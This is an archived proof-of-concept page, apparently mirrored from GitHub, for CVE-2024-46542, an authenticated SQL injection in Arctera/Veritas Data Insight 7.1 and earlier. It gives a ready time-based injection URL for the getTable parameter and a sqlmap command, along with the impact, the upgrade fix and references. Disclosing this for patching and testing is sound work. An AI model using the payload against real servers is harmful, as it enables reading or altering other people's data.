Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-46542 PoC — Arctera Data Insight 安全漏洞

Source
Associated Vulnerability
Title:Arctera Data Insight 安全漏洞 (CVE-2024-46542)
Description:Arctera Data Insight是Veritas Technologies的一款数据管理软件。 Arctera Data Insight 7.1.1之前版本存在安全漏洞。攻击者利用该漏洞可以执行 SQL 注入攻击。
Readme
# CVE-2024-46542

**Severity :** **Medium** (**6.5**)

**CVSS score :** `CVSS v3.1 Base Score 6.5 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)` 

## Summary :

A vulnerability was discovered in Veritas / Arctera Data Insight versions **7.1**, and prior.  The vulnerability allows an attacker to modify the syntax of a **SQL query** in one of the **administrative features** of the application.

## Poc
### Steps to Reproduce :
1. Log in with admin rights.
2. Perform the time based sql injection in the getTable parameter:
  ```html
  https://<ip>/data?getTable=info)+WHERE+8943=8943+AND+4718=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))--+veJY&db=_report&repid=77&page=1
  ```
  Alternatively sqlmap can be used:
  ```html
  sqlmap -u "https://<ip>/data?getTable=info&db=_report&repid=77&page=1" -p getTable --dbms sqlite --risk 3 --level 5
  ```
## Affected Version Details :

- <= 7.1

## Impact :

This may result in the attacker being able to submit arbitrary SQL commands on the back-end database to create, read, update, or delete data stored in the database.

## Mitigation :

- Upgrade to Data Insight version 7.1.1
  
## References :
- https://www.veritas.com/support/en_US/security/ARC24-001
- https://nvd.nist.gov/vuln/detail/CVE-2024-46542
File Snapshot

[4.0K] /data/pocs/4414b2d6a01d81edcad5caee8658429d18685e11 └── [1.2K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.